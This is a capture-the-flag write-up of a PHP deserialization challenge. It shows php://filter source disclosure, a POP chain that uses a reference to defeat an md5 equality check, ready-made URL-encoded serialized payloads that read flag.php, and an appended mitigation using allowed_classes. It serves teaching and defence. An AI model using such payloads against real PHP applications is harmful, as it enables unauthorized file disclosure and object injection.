[Blue Hat Cup 2020 (4th) Online Round] Soitgoes

Challenge
PHP deserialization with a POP chain; a standard challenge.
Walkthrough
1. Right-click index.php and view the source. It looks like a PHP stream wrapper (php://filter) is needed to read try.php.


2. ?file=php://filter/read=convert.base64-encode/resource= is not filtered this time, so index.php can be read directly.
index.php: (screenshot of the source, not reproduced)

try.php:

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    // Destructor: calls getFlag() on whatever object is stored in $alize.
    // This is the entry point of the POP chain.
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        // Both tokens start out as the same random md5 value.
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        // t2 is re-randomised, so t1 === t2 is meant to fail for a plain object.
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                // Prints the source of the file named in $f.
                echo @highlight_file($this->f,true);
            }
        }
    }
}

3. Finding the POP chain
The magic method __destruct() in class Seri calls getFlag(), and class Flag is where getFlag() is defined.
Construct a Flag object with flag.php as its argument: $Flag=new Flag('flag.php');
Construct a Seri object with $Flag as its argument, so that when the object is destroyed, __destruct() is called: $test=new Seri($Flag)
getFlag() also contains an md5 check that requires t1 and t2 to be equal. There is no need to predict the value; a PHP reference assignment does the job.

<?php
$a = 1;
$b = &$a;    // $b is a reference to $a, not a copy
$a = $a + 1;

Then the final value of $b also becomes 2, because $b was assigned by reference. So in the end: $Flag->t1 = &$Flag->t2;
Final payload:

<?php
// Same classes as try.php, so the object graph serializes identically.
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}
// Build the chain: Seri -> Flag('flag.php'), with t1 a reference to t2 so the
// re-randomisation inside getFlag() keeps the two values equal.
$Flag=new Flag('flag.php');
$Flag->t1 = &$Flag->t2;
$test = new Seri($Flag);
// serialize() encodes the reference as R:4; (t2 points back at slot 4, t1).
echo urlencode(serialize($test));
?>

O%3A4%3A%22Seri%22%3A1%3A%7Bs%3A5%3A%22alize%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A1%3A%22f%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A2%3A%22t1%22%3Bs%3A32%3A%224a2ddf148c5a9c42151a529e8cbdcc06%22%3Bs%3A2%3A%22t2%22%3BR%3A4%3B%7D%7D0a49e3c3a03ebde64f85c0bacd8a08e20a49e3c3a03ebde64f85c0bacd8a08e2
4. That alone is not enough: looking at index.php, the value passed as p is unserialized.
Final payload:

url/?file=try.php&p=O%3A4%3A"Seri"%3A1%3A{s%3A5%3A"alize"%3BO%3A4%3A"Flag"%3A3%3A{s%3A1%3A"f"%3Bs%3A8%3A"flag.php"%3Bs%3A2%3A"t1"%3Bs%3A32%3A"8e98d81f8217304975ccb23337bb5761"%3Bs%3A2%3A"t2"%3BR%3A4%3B}}6e17a5fd135fcaf4b49f2860c2474c7c6e17a5fd135fcaf4b49f2860c2474c7c
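Why the t1 === t2 check passes and how a defender stops this chain, as an added example that is not part of the original writeup or the challenge source. It reuses the two classes from try.php (without the echo and highlight_file calls), a payload in the same shape as the one above with a constructed t1 value, and two hypothetical helpers, demonstrateBypass() and hardenedUnserialize().

```php
<?php
// Added example, not code from the original writeup. Class bodies mirror try.php.

class Seri {
    public $alize;
    public function __destruct() {
        // Gadget entry point: whatever object sits in $alize gets getFlag() called.
        if (is_object($this->alize) && method_exists($this->alize, 'getFlag')) {
            $this->alize->getFlag();
        }
    }
}

class Flag {
    public $f;
    public $t1;
    public $t2;
    public function getFlag() {
        $this->t2 = md5(rand(1, 10000));   // t2 is re-randomised on every call
        return $this->t1 === $this->t2;    // only holds if t1 follows t2
    }
}

// Constructed payload in the writeup's shape. Slot numbering in the serialized
// stream is 1 = Seri, 2 = Flag, 3 = f, 4 = t1, so "R:4;" makes t2 a reference to t1.
const PAYLOAD = 'O:4:"Seri":1:{s:5:"alize";O:4:"Flag":3:{s:1:"f";s:8:"flag.php";'
              . 's:2:"t1";s:32:"0123456789abcdef0123456789abcdef";s:2:"t2";R:4;}}';

// Vulnerable path (hypothetical helper): unserialize() rebuilds the reference,
// so the comparison passes even though getFlag() overwrote t2 with a fresh value.
function demonstrateBypass(string $payload): bool {
    $obj = unserialize($payload);
    return $obj->alize->getFlag();
}

// Mitigation (hypothetical helper): refuse to instantiate classes from untrusted
// data. Seri and Flag come back as __PHP_Incomplete_Class, which has no
// __destruct and no getFlag(), so the chain never starts. A format such as JSON
// that cannot carry object or reference tokens is the stronger fix.
function hardenedUnserialize(string $payload) {
    return unserialize($payload, ['allowed_classes' => false]);
}

var_dump(demonstrateBypass(PAYLOAD));
var_dump(get_class(hardenedUnserialize(PAYLOAD)));
```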